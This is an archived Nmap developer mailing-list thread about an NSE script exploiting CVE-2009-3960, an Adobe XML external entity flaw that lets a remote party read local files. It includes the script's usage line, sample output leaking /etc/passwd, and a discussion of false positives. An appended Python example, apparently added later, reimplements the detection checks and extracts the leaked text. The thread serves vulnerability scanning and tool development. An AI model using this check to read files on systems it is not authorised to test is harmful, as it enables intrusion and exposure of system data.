Nmap Development mailing list archives
Re: [NSE] http-cve-2009-3960 (Adobe XML External Entity Injection)
From: Hani Benhabiles <kroosec () gmail com>
Date: Mon, 2 Jan 2012 00:32:08 +0100
Hi Patrik,

I've fixed this issue by adding matching tests in the attached version.

-- Matching returned response body to confirm vulnerability
local matchstart = '<?xml version="1.0" encoding="utf-8"?>'
local matchend = '</string><null/></object></body></amfx>'
local matchsize = 120
local matchnotvuln = '<string>External entities are not allowed</string>'

Cheers,
Hani.

On Sun, Jan 1, 2012 at 9:12 PM, Patrik Karlsson <patrik () cqure net> wrote:
On Sat, Dec 31, 2011 at 3:47 PM, Hani Benhabiles <kroosec () gmail com> wrote:

Hi list,

description = [[
Exploits cve-2009-3960 also known as Adobe XML External Entity Injection.
This vulnerability permits reading local files remotely and is present in
BlazeDS 3.2 and earlier, LiveCycle 8.0.1, 8.2.1, and 9.0, LiveCycle Data
Services 2.5.1, 2.6.1, and 3.0, Flex Data Services 2.0.1, and ColdFusion
7.0.2, 8.0, 8.0.1, and 9.0

For more information see:
* http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf
* http://www.osvdb.org/62292
* Metasploit module: auxiliary/scanner/http/adobe_xml_inject
]]

---
-- @args http-cve-2009-3960.root Points to the root path. Defaults to "/"
-- @args http-cve-2009-3960.readfile Target file to be read. Defaults to "/etc/passwd"
--
-- @usage
-- nmap --script=http-cve-2009-3960 --script-args http-cve-2009-3960.root="/root/" <target>
--
-- @output
-- PORT   STATE SERVICE
-- 80/tcp open  http
-- | http-cve-2009-3960:
-- |   samples/messagebroker/http
-- |     <?xml version="1.0" encoding="utf-8"?>
-- |     <amfx ver="3"><body targetURI="/onResult" responseURI=""><object type="flex.messaging.messages.AcknowledgeMessage"><traits><string>timestamp</string> [...]
-- |     root:x:0:0:root:/root:/bin/bash
-- |     bin:*:1:1:bin:/bin:/sbin/nologin
-- |     daemon:*:2:2:daemon:/sbin:/sbin/nologin
-- |     adm:*:3:4:adm:/var/adm:/sbin/nologin
-- |     lp:*:4:7:lp:/var/spool/lpd:/sbin/nologin
-- |     sync:*:5:0:sync:/sbin:/bin/sync
-- |     shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
-- |     halt:*:7:0:halt:/sbin:/sbin/halt
-- |     mail:*:8:12:mail:/var/spool/mail:/sbin/nologin
-- |     news:*:9:13:news:/etc/news:
-- |     uucp:*:10:14:uucp:/var/spool/uucp:/sbin/nologin
-- |     operator:*:11:0:operator:/root:/sbin/nologin
-- |     games:*:12:100:games:/usr/games:/sbin/nologin
-- |     gopher:*:13:30:gopher:/var/gopher:/sbin/nologin
-- |     ftp:*:14:50:FTP User:/var/ftp:/sbin/nologin
-- |     nobody:*:99:99:Nobody:/:/sbin/nologin
-- |     nscd:!!:28:28:NSCD Daemon:/:/sbin/nologin
-- |     vcsa:!!:69:69:virtual console memory owner:/dev:/sbin/nologin
-- |     pcap:!!:77:77::/var/arpwatch:/sbin/nologin
-- |     mailnull:!!:47:47::/var/spool/mqueue:/sbin/nologin
-- |     [...]
-- |_

Cheers,
Hani

--
M. Hani Benhabiles
OWASP Algeria SC founder and president.
Blog: http://kroosec.blogspot.com
Twitter: kroosec <https://twitter.com/#%21/kroosec>

_______________________________________________
Sent through the nmap-dev mailing list
http://cgi.insecure.org/mailman/listinfo/nmap-dev
Archived at http://seclists.org/nmap-dev/

Hi Hani,

Thanks for contributing with this new script! I've had a quick look at it and see a problem with how it detects whether a server is vulnerable or not. As an example, the current script will detect any server responding to a non-existent page (404) with a 200 OK with a body exceeding 120 characters as vulnerable. I guess the script needs to check for some other characteristics as well. Unfortunately I don't have access to anything I can test against, but if you have some packet captures I might be able to lend you a hand.

Cheers,
Patrik

--
Patrik Karlsson
http://www.cqure.net
http://twitter.com/nevdull77
--
M. Hani Benhabiles
OWASP Algeria SC founder and president.
Blog: http://kroosec.blogspot.com
Twitter: kroosec <https://twitter.com/#%21/kroosec>
Attachment: http-cve-2009-3960.nse
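To make the false-positive point concrete, here is an added example (in Python, not the NSE script or the attachment from this thread) that applies the four markers from Hani's revised script to HTTP responses: the naive "200 OK with more than 120 bytes" rule beside the hardened classifier, plus extraction of the leaked file text from the final <string> element. All three sample responses are constructed for the example and modelled on the @output in Hani's original mail; the shape of a patched server's refusal, and the assumption that it may reuse the same AMFX framing, are guesses rather than captured traffic.

```python
import re

# Markers copied from the script revision Hani posted in this thread.
MATCH_START = '<?xml version="1.0" encoding="utf-8"?>'
MATCH_END = '</string><null/></object></body></amfx>'
MATCH_SIZE = 120
MATCH_NOT_VULN = '<string>External entities are not allowed</string>'


def naive_check(status, body):
    """The heuristic Patrik objected to: any 200 OK whose body is longer than
    MATCH_SIZE bytes is reported as vulnerable, so a server that answers
    unknown paths with a 200 error page is a false positive."""
    return status == 200 and len(body) > MATCH_SIZE


def classify_response(status, body):
    """Classify one HTTP response as 'vulnerable', 'not-vulnerable' or 'unknown'.

    A positive needs all of: a 200 status, the AMFX framing at both ends of
    the body, and more than MATCH_SIZE bytes. The 'not allowed' marker is
    tested first because (assumption) a patched server may wrap its refusal
    in the same AMFX framing, which would otherwise look like a hit.
    """
    if status != 200:
        return "unknown"
    text = body.strip()
    if MATCH_NOT_VULN in text:
        return "not-vulnerable"
    if not (text.startswith(MATCH_START) and text.endswith(MATCH_END)):
        return "unknown"
    if len(text) <= MATCH_SIZE:
        return "unknown"
    return "vulnerable"


# The leaked file sits in the last <string> element before the closing tags;
# this assumes the file contents contain no '<' (true for /etc/passwd).
_LEAK_RE = re.compile(r"<string>([^<]*)</string><null/></object></body></amfx>$")


def extract_leaked_text(body):
    """Return the text of the final <string> element, or None if absent."""
    match = _LEAK_RE.search(body.strip())
    return match.group(1) if match else None


# --- Constructed sample responses (not real captures) -----------------------
_AMFX_HEAD = (
    MATCH_START
    + '<amfx ver="3"><body targetURI="/onResult" responseURI="">'
    + '<object type="flex.messaging.messages.AcknowledgeMessage">'
    + "<traits><string>timestamp</string></traits>"
)
# Shape of a successful read, modelled on the @output in Hani's original mail.
SAMPLE_VULN = (
    _AMFX_HEAD
    + "<string>root:x:0:0:root:/root:/bin/bash\n"
    + "bin:*:1:1:bin:/bin:/sbin/nologin\n"
    + MATCH_END
)
# Constructed guess at a patched server's answer: same framing, refusal text.
SAMPLE_PATCHED = (
    MATCH_START
    + '<amfx ver="3"><body targetURI="/onResult" responseURI="">'
    + '<object type="flex.messaging.messages.ErrorMessage">'
    + "<traits><string>faultString</string></traits>"
    + MATCH_NOT_VULN
    + "<null/></object></body></amfx>"
)
# Patrik's false-positive case: a 200 OK error page for a path that does not exist.
SAMPLE_SOFT_404 = (
    "<html><head><title>Not Found</title></head><body>"
    + "<p>The page you requested could not be found.</p>" * 4
    + "</body></html>"
)

if __name__ == "__main__":
    for name, status, body in [
        ("vulnerable server", 200, SAMPLE_VULN),
        ("patched server", 200, SAMPLE_PATCHED),
        ("soft 404", 200, SAMPLE_SOFT_404),
    ]:
        print(f"{name:18} naive={naive_check(status, body)!s:5} "
              f"hardened={classify_response(status, body)}")
```

Running it shows the soft 404 page tripping naive_check while classify_response leaves it at "unknown", and the patched response (which carries the full AMFX framing) being rejected only because the refusal marker is tested before the framing check.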